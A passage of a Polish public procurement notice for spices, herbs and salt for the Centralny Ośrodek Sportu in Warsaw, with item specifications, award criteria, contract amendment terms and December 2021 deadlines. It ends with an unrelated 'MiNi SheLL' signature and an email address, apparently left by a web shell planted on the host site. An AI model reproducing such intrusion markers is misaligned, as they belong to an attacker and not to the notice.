morza; mieszanka cebuli, skórki cytrynowej, czosnku, rozmarynu, natki pietruszki, koperku i kurkumy, bez sztucznych barwników, bez glutaminianu, bez konserwantów opakowanie PET maksimum a&#39; 1 kg typu Knor lub produkt równoważny............................................................................./* kg	15<br/>3	Przyprawa typu - MARYNATA PREMIUM - do wieprzowiny; mieszanka czosnku, cebuli, marchwi, bazylii, skórki pomarańczowej, natki pietruszki i szałwii. Zawiera sól morską oraz oliwę z oliwek. bez glutaminianu, bez konserwantów, bez sztucznych barwników opakowanie PET maksimum a&#39; 1 kg typu Knor lub produkt rownoważny.............................................................................* / kg	18<br/>4	Przyprawa typu - MARYNATA PREMIUM- do wołowiny; mieszanka czosnku, gorczycy, kolendry, papryki, chili, kminku, gałki muszkatołowej i nasion selera. Zawiera sól morską oraz oliwę z oliwek. bez glutaminianu, bez konserwantów, bez sztucznych barwników opakowanie PET maksimum a&#39; 1 kg typu Knor lub produkt równoważny............................................................................*/ kg	14<br/>5	ZIOŁA PROWANSALSKIE -mieszanka rozmarynu, bazylii, tymianku, szałwi, mięty, leboidka i majeranku. Opakowanie PET maksimum a&#39; 500g typu Kamis,Prymat lub produkt rownoważny………………………………………………….*/	kg	2<br/>6	ROZMARYN - zioła suszone opakowanie max 300g -przyprawa o silnym aromatycznym zapachu oraz korzennym,palącym nieco gprzkim smaku.Służy do przyprawiania potraw mięsnych.również do zup jarzynowych,sosów- typu Kamis,Prymat lub produkt rownoważny………………………………………………..*/ kg	2<br/>7	CZOSNEK GRANULOWANY- opakowanie PET max 0,50 kg ............................................................................*/ kg	1<br/>8	MAJERANEK SUSZONY- o wyrazistym smaku i zapachu,,opakowanie max 250 g...........................................................................*/ kg	6<br/>9	BAZYLIA - liscie bazylii wonnej, opakowanie PET maks.300 g……………………………………………..*/	kg	2<br/>10	TYMIANEK – o wyrazistym smaku i zapachu Opakowanie PET maksimum a&#39; 300g ………………………………………………….*/	kg	1<br/>11	KURKUMA – Koloru żółtego, drobno mielona be grudek. O wyraźnym smaku i zapachu typowym dla tej przyprawy. Opakowanie PET max a&#39; 600g typu Prymat lub produkt równowazny………………………………………………….*/	kg	1<br/>12	PAPRYKA SŁODKA, MIELONA – Koloru ciemnoczerwonego, bez grudek, drobno mielona, O wyraźnym smaku i zapachu typowym dla tej przyprawy. opakowanie PET max1,0 kg typu Prymat,Kamis Kotanyi lub produkt rownowazny..............................................................................*/ kg	8<br/>13	PIEPRZ CZARNY, MIELONY - Drobno mielony, bez grudek, o charakterystycznym smaku i zapachu typowym dla tej przyprawy opakowanie PET max1,0 kg typu Prymat,Kamis,Knor lub produkt rownoważny..........................................................................* / kg	20<br/>14	LIŚĆ LAUROWY opakowanie max 25 g ……………………………………………..*/	kg	1,5<br/>15	PIEPRZ CZARNY, CAŁY – Całe ziarna pieprzu czarnego, aromatyczne, o, charakterystycznym smaku i zapachu typowym dla tej przyprawy opakowanie PET max 700g typu Prymat,Kamis lub produkt rownowazny………………………………………………….*/ kg	1<br/>16	PIEPRZ KOLOROWY MŁOTKOWANY – młotkowane ziarna kolorowego pieprzu, o charakterystycznym smaku i zapachu typowym dla tej przyprawy opakowanie PET maksimum a&#39; 500g, typu Kamis,Prymat lub produkt równoważny.............................................................................*/ kg	1<br/>17	ZIELE ANGIELSKIE - o charakterystycznym smaku i zapachu typowym dla tej przyprawy opakowanie PET max 800g typu Kamis,Prymat lub produkt równoważny.............................................................................*/ kg	7<br/>18	SÓL WARZONA JODOWANA - spożywcza opakowanie max. 1 kg …………………………………………………*/	kg	400<br/>19	Przyprawa typu – Delikt Przyprawa warzywna Szefa Kuchni – mieszanka przypraw i warzyw nie zawiera konserwantów i sztucznych barwiników. Opakowanie max 10 kg .typu Knor lub produkt równoważny...........................................................................*/	kg	400<br/>20	Cynamon mielony – Drobno mielony, bez zbryleń, o charakterystycznym smaku i zapachu typowym dla tej przyprawy opakowanie PET max 600g ……………………………………………..*/	kg	3<br/>21	Oregano - o charakterystycznym smaku i zapachu typowym dla tej przyprawy opakowanie pet max 500g ………………………………………………….*/	kg	1,5<br/>22	Kminek - o charakterystycznym smaku i zapachu typowym dla tej przyprawy opakowanie PET max 500 g ………………………………………………….*/	kg	2<br/>23	Gorczyca - o charakterystycznym smaku i zapachu typowym dla tej przyprawy – opakowanie PET max 1 kg ………………………………………………..*/	kg	1<br/>24	Curry – drobno mielona, pikantna przyprawa o ciemno żółtym kolorze, charakterystycznym smaku i zapachu typowym dla tej przyprawy opakowanie PET max 1 kg ………………………………………………*/	kg	2<br/>25	Przyprawa typu - Przyprawa do flaków - sól, warzywa suszone (marchew, czosnek, cebula, pasternak, liście selera), papryka słodka, imbir, gałka muszkatołowa, gorczyca, cukier, hydrolizat białkowy sojowy, pieprz czarny, chili, liście laurowe, kurkuma. opakowanie max 1 kg ,typu Prymat lub produkt rownoważny……………………………………………….*/	kg	2<br/>26	Sól himalajska spożywcza opakowanie max 1 kg………………………………………………….*/	kg	2<br/>27	WANILIA LASKA – pakowana pojedynczo, zabezpieczona przed wyschnięciem, jędrna o intensywnym waniliowym zapachu. Nie wysuszona. opakowanie blister 1 szt ……………………………………………….*/	szt	4<br/>28	CHILI – drobno mielona, bez zbryleń, o charakterystycznym smaku i zapachu typowym dla tej przyprawy opakowanie PET max 600g ……………………………………………..*/	kg	2<br/>29	Owoc jałowca - przyprawa korzenna opakowanie PET max 600g typu Kamis lub produkt równoważny…………………………………* /	kg	1<br/>30	Gałka muszkatałowa – proszek drobno mielony, bez zbryleń, o charakterystycznym smaku i zapachu typowym dla tej przyprawy opakowanie pet max 1 kg …………………………………..*/	kg	1<br/>31	Kmin Rzymski - Cumin w proszku o charakterystycznym smaku i zapachu typowym dla tej przyprawy opakowanie max 1 kg ………………………………………*/	kg	2<br/>32	Goździki - o charakterystycznym smaku i zapachu typowym dla tej przyprawy opakowanie PET max 500g ……………………………………….*/	kg	1<br/>33	Przyprawa typu - Delikat przyprawa do gyrosa– pikantna przyprawa zawierająca sól, cebulę, paprykę, oregano, kolendrę, czosnek, gorczycę, pieprz czarny, rozmaryn, cukier i pieprz cayenne. Bez konserwantów i stucznych barwników opakowanie Pet max 1 kg typu Knor lub produkt równoważny.........................................................*/	kg	2<br/>34	Przyprawa do frytek i ziemniaków-skladniki-sól,czosnek,papryka,cukier,olej słonecznikowy,pieprz biały-opak max 500 gr typu Knor lub produkt równoważny….....................	kg	5<br/>35	Przyprawa w płynie typu - Delikat przyprawa w płynie – bez sztucznych barwników. opakowanie butelka max 1 l typu Knor lub produkt rownoważny.........................................................*/	litr	300 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15872000-1 - Zioła i przyprawy korzenne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15872400-5 - Sól</p> <p class="mb-0">15893200-6 - Mieszanki deserowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">9 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punktowy</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oświadczenie, że dostarczane produkty będą wysokiej jakości, będą spełniać wymagania jakościowe, dotyczące przechowywania, pakowania i transportu zawarte w Polskich Normach przenoszących normy europejskie oraz będą posiadać ważne terminy przydatności do spożycia (z minimum 3 miesięcznym okresem przydatności do spożycia w momencie dostawy), a także posiadają atesty i/lub pozwolenia potwierdzające, że poprzez odpowiednie odniesienie dokładnie oznaczone produkty będące przedmiotem dostawy odpowiadają wskazanym normom. a na żądanie Zamawiającego, do wskazanej dostawy załączony zostanie dokument stanowiący potwierdzenie tych wymagań <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Każdy z wykonawców wspólnie ubiegających się o zamówienie składa osobno oświadczenie z art. 125 ust. 1 <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Umowa zawarta zostaje na okres 9 miesięcy licząc od dnia zawarcia umowy, z zastrzeżeniem ust. 2 i ust.3.<br/>2. Umowa wygaśnie, bez konieczności składania odrębnych oświadczeń Stron w przypadku wykonania w trakcie trwania Umowy dostaw na kwotę wynagrodzenia brutto równą wartości brutto wynagrodzenia Wykonawcy, o którym mowa w § 5 ust. 1 (wartość świadczenia).<br/>3. W przypadku nieosiągnięcia całkowitej wartości wynagrodzenia Wykonawcy, o którym mowa w § 5 ust. 1, w okresie, o którym mowa w § 2 ust. 1, Strony ustalają zmianę terminu obowiązywania Umowy do czasu osiągnięcia kwoty wynagrodzenia brutto wskazanej w § 5 ust. 1, nie dłużej jednak niż na okres do 3 miesięcy.<br/>1. Strony dopuszczają następujące możliwości zmiany umowy w trakcie jej wykonywania:.<br/>a) w zakresie zwiększenia lub zmniejszenia stawki podatku od towarów i usług (VAT) na podstawie odrębnych przepisów, które wejdą w życie po dniu zawarcia umowy, od dnia dokonania zmian przepisów w tym zakresie, proporcjonalnie do wprowadzonych zmian przepisów,<br/>b) w przypadku nieosiągnięcia całkowitej wartości wynagrodzenia Wykonawcy, o którym mowa w § 5 ust. 1, w okresie, o którym mowa w § 2 ust. 1, Strony ustalają zmianę terminu obowiązywania Umowy do czasu osiągnięcia kwoty wynagrodzenia brutto wskazanej w § 5 ust. 1, nie dłużej niż na okres do 3 miesięcy.<br/>2. Wniosek o dokonanie zmiany Umowy należy przedłożyć na piśmie, a okoliczności stanowiące podstawę zmiany Umowy powinny być uzasadnione, a w miarę możliwości również udokumentowane przez Wykonawcę.<br/>1. Strony niniejszej umowy niezwłocznie, wzajemnie informują się o wpływie okoliczności związanych z wystąpieniem COVID-19 na należyte wykonanie niniejszej umowy, o ile taki wpływ wystąpił lub może wystąpić. Strony umowy potwierdzają ten wpływ dołączając do informacji, o której mowa w zdaniu pierwszym, oświadczenia lub dokumenty, które mogą dotyczyć w szczególności:<br/>1) nieobecności pracowników lub osób świadczących pracę za wynagrodzeniem na innej podstawie niż stosunek pracy, które uczestniczą lub mogłyby uczestniczyć w realizacji zamówienia;<br/>2) decyzji wydanych przez Głównego Inspektora Sanitarnego lub działającego z jego upoważnienia państwowego wojewódzkiego inspektora sanitarnego, w związku z przeciwdziałaniem COVID-19, nakładających na wykonawcę obowiązek podjęcia określonych czynności zapobiegawczych lub kontrolnych;<br/>3) poleceń lub decyzji wydanych przez wojewodów, ministra właściwego do spraw zdrowia lub Prezesa Rady Ministrów, związanych z przeciwdziałaniem COVID-19, o których mowa w art. 11 ust. 1-3 ustawy z dnia 2 marca 2020 r. o szczególnych rozwiązaniach związanych z zapobieganiem, przeciwdziałaniem i zwalczaniem COVID-19, innych chorób zakaźnych oraz wywołanych nimi sytuacji kryzysowych (Dz.U. z 2020 r. poz. 374 z późn. zm.) ;<br/>4) wstrzymania dostaw produktów, komponentów produktu lub materiałów, trudności w dostępie do sprzętu lub trudności w realizacji usług transportowych;<br/>5) innych okoliczności, które uniemożliwiają bądź w istotnym stopniu ograniczają możliwość wykonania umowy;<br/>4. Zamawiający, po stwierdzeniu, że okoliczności związane z wystąpieniem COVID-19, o których mowa w ust. 1, mogą wpłynąć lub wpływają na należyte wykonanie umowy, o której mowa w ust. 1, może w uzgodnieniu z wykonawcą dokonać zmiany umowy, o której mowa w art. 455 ust. 1 pkt 4 ustawy z dnia 11 września 2019 r. - Prawo zamówień publicznych , w szczególności przez:<br/>1) zmianę terminu wykonania umowy lub jej części, lub czasowe zawieszenie wykonywania umowy lub jej części,<br/>2) zmianę sposobu wykonywania usług dostaw,<br/>3) zmianę zakresu świadczenia wykonawcy i odpowiadającą jej zmianę wynagrodzenia lub sposobu rozliczenia wynagrodzenia wykonawcy - o ile wzrost wynagrodzenia spowodowany każdą kolejną zmianą nie przekroczy 50% wartości pierwotnej umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-22 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">drogą elektroniczną przy użyciu miniPortalu https://miniportal.uzp.gov.pl/, ePUAPu https://epuap.gov.pl/wps/portal (adres skrzynki ePUAP Zamawiającego /COS-IGB/SkrytkaESP - podmiot: Centralny Ośrodek Sportu Warszawa)</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-22 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-20</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com